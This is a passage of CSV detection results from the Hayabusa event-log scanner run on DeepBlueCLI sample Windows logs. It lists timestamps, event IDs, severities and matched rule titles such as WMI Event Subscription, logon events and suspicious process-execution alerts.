Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:31.272 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:46:57.850 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:48:29.225 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:48:29.850 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f43 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 02:58:14.879 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:32:03.644 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:35:43.160 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:37:00.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:41:07.910 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:44:49.144 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:33.988 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 03:57:47.863 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:00:03.457 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:02:44.129 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:02:44.129 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx -2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx -2013-10-24 04:25:30.000 